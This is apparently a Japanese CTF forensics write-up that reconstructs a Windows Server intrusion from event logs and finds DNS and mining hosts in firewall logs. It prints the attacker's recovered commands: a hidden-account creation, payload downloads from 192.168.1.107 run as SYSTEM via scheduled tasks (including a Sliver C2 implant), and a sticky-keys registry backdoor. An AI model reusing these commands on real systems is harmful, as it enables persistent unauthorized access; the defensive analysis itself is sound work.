[Forensics] Wimdowsシリーズ
Earlier this week, an attacker managed to get into one of our Windows servers... can you help us figure out what happened? The VM files for this challenge are located below (the credentials are vagrant/vagrant):
Windows Serverのovaファイルが与えられるので解析して、小問題に答える。1~5に分かれているのだが、分かる問題から解いていこう(時間とかが得られると他の問題も解きやすくなるので)
Wimdows 3
The attacker also created a new account- what group did they add this account to? Wrap your answer in byuctf{}. E.g. byuctf{CTF Players}.
攻撃者は新しいアカウントも作成しました。彼らはこのアカウントをどのグループに追加しましたか?回答をbyuctf{}で囲んでください。例:byuctf{CTF Players}。
Reminder - all answers are case-INsensitive for all of these problems
イベントログを解析すればわかりますね。ovaファイルを7zipで解凍して出てきたvmdkファイルをAutopsyに突っ込んで中身を確認する。
/img_byuctf-wimdows-disk001.vmdk/vol_vol2/Windows/System32/winevt/Logs を全部持ってきて、Hayabusaにとりあえずかけてみよう。
Dates with most total detections: emergency: n/a, critical: 2025-05-16 (2), high: 2025-05-16 (23), medium: n/a, low: n/a, informational: n/a Top 5 computers with most unique detections: emergency: n/a critical: vagrant-2008R2 (2) high: vagrant-2008R2 (15) medium: n/a low: n/a informational: n/a ╭─────────────────────────────────────────────────────────────────────────────────────────────────────╮ │ Top emergency alerts: Top critical alerts: │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤ │ n/a Sticky Key Like Backdoor Usage - Registry (1) │ │ n/a HackTool - Sliver C2 Implant Activity Pat... (1) │ │ n/a n/a │ │ n/a n/a │ │ n/a n/a │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤ │ Top high alerts: Top medium alerts: │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤ │ Powershell Token Obfuscation - Powershell (6) n/a │ │ Suspicious Service Path (4) n/a │ │ Windows Shell/Scripting Processes Spawnin... (3) n/a │ │ User Added To Local Admin Grp (2) n/a │ │ Suspicious SYSTEM User Process Creation (2) n/a │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤ │ Top low alerts: Top informational alerts: │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤ │ n/a n/a │ │ n/a n/a │ │ n/a n/a │ │ n/a n/a │ │ n/a n/a │ ╰──────────────────────────────────────────────────╌──────────────────────────────────────────────────╯
すごいね。眺めるとユーザー操作関連の記録も残っていた。
Timestamp Rule Title Level Computer Channel Event ID Record ID Details Extra Field Info 2025-05-16 11:08:48.871 +09:00 User Added to Remote Desktop Users Group high vagrant-2008R2 Sysmon 1 54 Cmdline: "C:\Windows\system32\net.exe" localgroup "Remote Desktop Users" phasma /add ¦ Proc: C:\Windows\System32\net.exe ¦ User: NT AUTHORITY\SYSTEM ¦ ParentCmdline: powershell -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand bgBlAHQAIABsAG8AYwBhAGwAZwByAG8AdQBwACAAIgBSAGUAbQBvAHQAZQAgAEQAZQBzAGsAdABvAHAAIABVAHMAZQByAHMAIgAgAHAAaABhAHMAbQBhACAALwBhAGQAZAA= ¦ LID: 0x3e7 ¦ LGUID: 0557F2DF-0000-0000-E703-000000000000 ¦ PID: 6000 ¦ PGUID: 0557F2DF-0000-0000-0C5C-0D0000000000 ¦ ParentPID: 5136 ¦ ParentPGUID: 0557F2DF-0000-0000-DA51-0D0000000000 ¦ Description: Net Command ¦ Product: Microsoft® Windows® Operating System ¦ Company: Microsoft Corporation ¦ Hashes: MD5=63DD6FBAABF881385899FD39DF13DCE3,SHA256=3B9AD8E2C1D03FF941A7C9192A605F31671B107DEF6FF503A71A0FB2C5BBD659,IMPHASH=96B4B43C2313DC3C3237F7C32A9F8812 CurrentDirectory: C:\Program Files\elasticsearch-1.1.1\ ¦ FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255) ¦ IntegrityLevel: System ¦ OriginalFileName: net.exe ¦ ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ¦ RuleName: - ¦ TerminalSessionId: 0 ¦ UtcTime: 2025-05-16 02:08:48.856 2025-05-16 11:08:48.871 +09:00 User Added to Remote Desktop Users Group high vagrant-2008R2 Sysmon 1 55 Cmdline: C:\Windows\system32\net1 localgroup "Remote Desktop Users" phasma /add ¦ Proc: C:\Windows\System32\net1.exe ¦ User: NT AUTHORITY\SYSTEM ¦ ParentCmdline: "C:\Windows\system32\net.exe" localgroup "Remote Desktop Users" phasma /add ¦ LID: 0x3e7 ¦ LGUID: 0557F2DF-0000-0000-E703-000000000000 ¦ PID: 5888 ¦ PGUID: 0557F2DF-0000-0000-8F5C-0D0000000000 ¦ ParentPID: 6000 ¦ ParentPGUID: 0557F2DF-0000-0000-0C5C-0D0000000000 ¦ Description: Net Command ¦ Product: Microsoft® Windows® Operating System ¦ Company: Microsoft Corporation ¦ Hashes: MD5=3B6928BC39E5530CEAD1E99269E7B1EE,SHA256=0F084CCC40CBF7C3C7472DDAD609B5FD31AACAFA44E23F9EC7E9E2184713B986,IMPHASH=72AA515B1963995C201E36DE48594F61 CurrentDirectory: C:\Program Files\elasticsearch-1.1.1\ ¦ FileVersion: 6.1.7601.17514 (win7sp1_rtm.101119-1850) ¦ IntegrityLevel: System ¦ OriginalFileName: net1.exe ¦ ParentImage: C:\Windows\System32\net.exe ¦ RuleName: - ¦ TerminalSessionId: 0 ¦ UtcTime: 2025-05-16 02:08:48.871
何回も言っているが、ほんとにすごいなHayabusa。
"C:\Windows\system32\net.exe" localgroup "Remote Desktop Users" phasma /add
の実行形跡がありますね。よってbyuctf{Remote Desktop Users}
Wimdows 5
Last but not least, the attacker put another backdoor in the machine to give themself SYSTEM privileges... what was it? (your answer will be found directly in byuctf{} format)
最後になりますが、攻撃者は自身にSYSTEM権限を与えるための別のバックドアをマシンに仕掛けました。それは何でしたか?(あなたの答えはbyuctf{}形式で直接見つかるはずです)
hayabusaの結果を見ていくと、以下のような検出事項もある。
Timestamp Rule Title Level Computer Channel Event ID Record ID Details
2025-05-16 11:10:42.794 +09:00 Sticky Key Like Backdoor Usage - Registry crit vagrant-2008R2 Sysmon 13 88 EventType: SetValue ¦ RegKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger ¦ Details: C:\windows\system32\cmd.exe #byuctf{00p5_4ll_b4ckd00r5_139874} ¦ Proc: C:\Windows\system32\reg.exe ¦ PID: 4460 ¦ PGUID: 0557F2DF-0000-0000-7BEA-0D0000000000 ¦ User: NT AUTHORITY\SYSTEM
ここにあるフラグを答えると正答。某Offensive資格のコースでも紹介されてた気がするバックドア。 問題文によるとこれは攻撃者の最後の行動らしい。2025-05-16T11:10:42+0900以前でログ等は見ればよさそう。
Wimdows 2
Once they got in, the attacker ran some commands on the machine, but it looks like they tried to hide what they were doing. See if you can find anything interesting there (your answer will be found already in byuctf{} format).
侵入後、攻撃者はマシン上でいくつかのコマンドを実行しましたが、彼らは自分たちの行動を隠そうとしたようです。そこに何か興味深いものがないか確認してください(あなたの答えはすでにbyuctf{}形式で見つかるはずです)。
行動を隠すと言えばログ削除とかだが… 問題文を見る感じPowerShellの実行ログを見ればいい?それ用のイベントログを見てもいいのだが、hayabusaで適当に-EncodedCommandでキーワード検索して、攻撃が実行されている時間近辺でのPowerShell呼び出しを漁ってみる。
2025-05-16 11:07:47.000 +09:00 | ls
2025-05-16 11:08:01.000 +09:00 | whoami /priv
2025-05-16 11:08:07.000 +09:00 | ls -l
2025-05-16 11:08:12.000 +09:00 | write-output 'byuctf{n0w_th4t5_s0m3_5u5_l00k1ng_p0w3rsh3ll_139123}'
2025-05-16 11:08:18.000 +09:00 | get-process
2025-05-16 11:08:22.000 +09:00 | get-service
2025-05-16 11:08:28.000 +09:00 | net user phasma f1rst0rd3r! /add
2025-05-16 11:08:36.000 +09:00 | New-Item -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" -Force | Out-Null
2025-05-16 11:08:43.000 +09:00 | New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" -Name "phasma" -Value 0 -PropertyType DWord -Force
2025-05-16 11:08:48.000 +09:00 | net localgroup "Remote Desktop Users" phasma /add
2025-05-16 11:08:59.000 +09:00 | $ProgressPreference = 'SilentlyContinue' ; Invoke-WebRequest -Uri "http://192.168.1.107:8000/goose.zip" -OutFile C:\goose.zip ; icacls C:\goose.zip /grant 'Everyone:(OI)(CI)F' /T ; Expand-Archive -Path C:\goose.zip -DestinationPath C:\goose -Force ; schtasks /create /tn $(-join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})) /tr "C:\goose\goose\GooseDesktop.exe" /sc minute /mo 1 /st $(Get-Date).AddMinutes(1).ToString("HH:mm") /ru $(((quser | Select-Object -Skip 1 -First 1) -split "\s\s+")[0].TrimStart(' '))
2025-05-16 11:10:15.000 +09:00 | $BINARY='C:\Windows\System32\update.exe' ; $ProgressPreference = 'SilentlyContinue' ; Invoke-WebRequest -Uri "http://192.168.1.107:8000/update.exe" -OutFile $BINARY ; schtasks /create /tn "updates" /tr $BINARY /ru 'SYSTEM' /sc onstart /rl highest ; schtasks /run /tn "updates"
あった。これを答える。
Wimdows 4
Using their access, the attacker also deployed a C2 binary on the machine - what C2 framework was it, and what IP address was the C2 attempting to connect to?
攻撃者はそのアクセスを利用して、マシン上にC2バイナリも配置しました。それはどのC2フレームワークで、どのIPアドレスに接続しようとしていましたか?
Format your answer like so: byuctf{_ }. E.g. byuctf{evilosx_10.1.1.1}
HayabusaによるとSliver C2が動いているらしい。
Timestamp Rule Title Level Computer Channel Event ID Record ID Details 2025-05-16 11:10:41.908 +09:00 HackTool - Sliver C2 Implant Activity Pattern crit vagrant-2008R2 Sysmon 1 85 Cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8 ¦ Proc: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ¦ User: NT AUTHORITY\SYSTEM ¦ ParentCmdline: C:\Windows\System32\update.exe ¦ LID: 0x3e7 ¦ LGUID: 0557F2DF-0000-0000-E703-000000000000 ¦ PID: 860 ¦ PGUID: 0557F2DF-0000-0000-FDDF-0D0000000000 ¦ ParentPID: 1044 ¦ ParentPGUID: 0557F2DF-0000-0000-ECCF-0D0000000000 ¦ Description: Windows PowerShell ¦ Product: Microsoft® Windows® Operating System ¦ Company: Microsoft Corporation ¦ Hashes: MD5=A575A7610E5F003CC36DF39E07C4BA7D,SHA256=006CEF6EF6488721895D93E4CEF7FA0709C2692D74BDE1E22E2A8719B2A86218,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453
先ほど解析した、PowerShellコマンドの解析を見ると
2025-05-16 11:08:59.000 +09:00 | $ProgressPreference = 'SilentlyContinue' ; Invoke-WebRequest -Uri "http://192.168.1.107:8000/goose.zip" -OutFile C:\goose.zip ; icacls C:\goose.zip /grant 'Everyone:(OI)(CI)F' /T ; Expand-Archive -Path C:\goose.zip -DestinationPath C:\goose -Force ; schtasks /create /tn $(-join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})) /tr "C:\goose\goose\GooseDesktop.exe" /sc minute /mo 1 /st $(Get-Date).AddMinutes(1).ToString("HH:mm") /ru $(((quser | Select-Object -Skip 1 -First 1) -split "\s\s+")[0].TrimStart(' '))
2025-05-16 11:10:15.000 +09:00 | $BINARY='C:\Windows\System32\update.exe' ; $ProgressPreference = 'SilentlyContinue' ; Invoke-WebRequest -Uri "http://192.168.1.107:8000/update.exe" -OutFile $BINARY ; schtasks /create /tn "updates" /tr $BINARY /ru 'SYSTEM' /sc onstart /rl highest ; schtasks /run /tn "updates"
とあり、このupdate.exeの少し後に上のアラートが出ている。これか?C:\Windows\System32\update.exeに保存されているようなので探してみるとあった。CTFやし、誰かVT上げてるやろと思い、sha256ハッシュを取り、検索するとやはりあった。
セキュリティベンダーの判定を見ると、Sliverというのは合ってるみたい。Communityに動的解析に投げた結果がいくつかあったので、https://www.vmray.com/analyses/_vt/57baac926083/report/network.html を見ると、通信先のIPアドレスが得られる。よって、byuctf{sliver_192.168.1.224}で正答。
Wimdows 1
What CVE did the attacker exploit to get a shell on the machine? Wrap your answer in byuctf{}. E.g. byuctf{CVE-2021-38759}
Hint: Figure out what process the attacker exploited and look up vulnerabilities associated with it.
攻撃者がマシン上でシェルを取得するために悪用したCVEは何ですか?あなたの回答をbyuctf{}で囲んでください。例:byuctf{CVE-2021-38759}
ヒント:攻撃者がどのプロセスを悪用したかを特定し、それに関連する脆弱性を調べてください。
何を起点に探したものかな。環境を見るとかなり古いのでどこからでも入れそうな気もするが… とりあえず、ここまでの情報から攻撃開始の痕跡が見つかっているのは2025-05-16 11時あたりなので、その辺りの時間で色々見てみることにする。
SysmonのMicrosoft-Windows-Sysmon%4Operational.evtxを見ると
{"EventData":{"Data":[{"@Name":"RuleName","#text":"-"},{"@Name":"UtcTime","#text":"2025-05-16 02:07:47.793"},{"@Name":"ProcessGuid","#text":"0557f2df-0000-0000-12c4-0c0000000000"},{"@Name":"ProcessId","#text":"2144"},{"@Name":"Image","#text":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},{"@Name":"FileVersion","#text":"10.0.14409.1005 (rs1_srvoob.161208-1155)"},{"@Name":"Description","#text":"Windows PowerShell"},{"@Name":"Product","#text":"Microsoft® Windows® Operating System"},{"@Name":"Company","#text":"Microsoft Corporation"},{"@Name":"OriginalFileName","#text":"PowerShell.EXE"},{"@Name":"CommandLine","#text":"powershell -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand bABzAA=="},{"@Name":"CurrentDirectory","#text":"C:\\Program Files\\elasticsearch-1.1.1\\"},{"@Name":"User","#text":"NT AUTHORITY\\SYSTEM"},{"@Name":"LogonGuid","#text":"0557f2df-0000-0000-e703-000000000000"},{"@Name":"LogonId","#text":"0x3E7"},{"@Name":"TerminalSessionId","#text":"0"},{"@Name":"IntegrityLevel","#text":"System"},{"@Name":"Hashes","#text":"MD5=A575A7610E5F003CC36DF39E07C4BA7D,SHA256=006CEF6EF6488721895D93E4CEF7FA0709C2692D74BDE1E22E2A8719B2A86218,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453"},{"@Name":"ParentProcessGuid","#text":"0557f2df-0000-0000-bbfe-000000000000"},{"@Name":"ParentProcessId","#text":"1448"},{"@Name":"ParentImage","#text":"C:\\Program Files\\elasticsearch-1.1.1\\bin\\elasticsearch-service-x64.exe"},{"@Name":"ParentCommandLine","#text":"\"C:\\Program Files\\elasticsearch-1.1.1\\bin\\elasticsearch-service-x64.exe\" //RS//elasticsearch-service-x64"},{"@Name":"ParentUser","#text":"NT AUTHORITY\\SYSTEM"}]}}
のようなログが残っていて、親プロセスC:\Program Files\elasticsearch-1.1.1\bin\elasticsearch-service-x64.exeがPowerShellのコマンドを読んでいた。bABzAA=なのでlsを実行している。elasticsearch-1.1.1でRCE出来そうな脆弱性を探すと、CVE-2014-3120が出てきて、これをフォーマットにくるんで答えると正答。
[Forensics] Are You Looking Me Up?
The network has a DNS server that's been receiving a lot of traffic. You've been handed a set of raw network logs. Your job? Hunt down the DNS server that has received the most DNS requests.
Analyze the logs and find the impostor.
Flag format: byuctf{IP1}
ネットワークには、多くのトラフィック(通信量)を受けているDNSサーバーがあります。あなたには、加工されていない生のネットワークログ一式が手渡されました。あなたの仕事は?最も多くのDNSリクエストを受け取ったDNSサーバーを突き止めることです。
ログの中身はこんな感じ
2025-05-06T14:49:32+00:00 155,,,c0dbc3f4f934c1cb95f41a1f3d23a189,vtnet0,match,pass,in,4,0x0,,128,23413,0,none,17,udp,72,172.16.0.10,172.16.0.1,53829,53,52 2025-05-06T14:49:32+00:00 164,,,75a2b136446ad166a85f3150b40b7d1e,vtnet0,match,pass,in,4,0x0,,128,41412,0,none,17,udp,72,172.16.0.10,8.8.8.8,53829,53,52 2025-05-06T14:49:32+00:00 164,,,75a2b136446ad166a85f3150b40b7d1e,vtnet0,match,pass,in,4,0x0,,128,9674,0,DF,6,tcp,52,172.16.0.10,4.149.227.78,65308,443,0,S,3208345317,,64240,,mss;nop;wscale;nop;nop;sackOK 2025-05-06T14:49:32+00:00 164,,,75a2b136446ad166a85f3150b40b7d1e,vtnet0,match,pass,in,4,0x0,,128,63011,0,DF,6,tcp,52,172.16.0.10,52.183.205.142,65309,443,0,S,2199077471,,64240,,mss;nop;wscale;nop;nop;sackOK 2025-05-06T14:49:32+00:00 164,,,75a2b136446ad166a85f3150b40b7d1e,vtnet0,match,pass,in,4,0x0,,128,21701,0,DF,6,tcp,52,172.16.0.10,13.95.31.18,65310,443,0,S,3089797986,,64240,,mss;nop;wscale;nop;nop;sackOK
2025-05-06T14:49:32+00:00 164,,,75a2b136446ad166a85f3150b40b7d1e,vtnet0,match,pass,in,4,0x0,,128,41412,0,none,17,udp,72,172.16.0.10,8.8.8.8,53829,53,52
を見ると8.8.8.8が来ている部分に送信先が書かれていて、53というポート番号も見えるので、53のポート番号でスキャンして、送信先IPアドレスを取ってきてカウントするシェル芸をやる。
$ cat logs.txt | grep ",53," | cut -d',' -f20 | sort | uniq -c | sort -rn | head
133444 172.16.0.1
73490 216.239.32.106
41183 172.16.96.1
3614 8.8.8.8
215 172.16.16.1
206 172.16.64.1
で、一番上のやつをフォーマットにくるんで送ると正解。
[Forensics] Mine Over Matter
Your SOC has flagged unusual outbound traffic on a segment of your network. After capturing logs from the router during the anomaly, they handed it over to you—the network analyst.
Somewhere in this mess, two compromised hosts are secretly mining cryptocurrency and draining resources. Analyze the traffic, identify the two rogue IP addresses running miners, and report them to the Incident Response team before your network becomes a crypto farm.
Flag format: byuctf{IP1,IP2} (it doesn't matter what order the IPs are in)
あなたのSOC(セキュリティオペレーションセンター)は、ネットワークの一部で不審なアウトバウンドトラフィック(外部への通信)を検出しました。異常発生中にルーターからログをキャプチャした後、彼らはネットワークアナリストであるあなたにそれを手渡しました。
この大量のデータ(ログ)の中に、2つの侵害されたホストが密かに仮想通貨のマイニングを行い、リソースを枯渇させています。トラフィックを分析し、マイナーを実行している2つの不正なIPアドレスを特定し、あなたのネットワークがクリプトファーム(仮想通貨採掘場)になる前に、それらをインシデント対応チームに報告してください。
フラグ形式:byuctf{IP1,IP2} (IPアドレスの順序は問いません)
前問と同じログが与えられるので、設問に答える問題。「ネットワークの一部で不審なアウトバウンドトラフィック(外部への通信)を検出」とあるので接続先IPアドレスで通信が多いものを見てみる。
$ cat logs.txt | cut -d',' -f20 | sort | uniq -c | sort -rn | head 164377 172.16.0.1 129590 239.255.255.250 73490 216.239.32.106 58137 255.255.255.255 42898 172.16.96.1 18978 104.26.11.102 18608 104.26.10.102 18508 172.67.69.190 17758 1.1.1.1 17260 51.79.229.21
Public IPアドレスを上から見ていくと、104.26.11.102と104.26.10.102に対して、172.16.0.10と172.16.0.5から通信が出ていた。これを答えると正解。
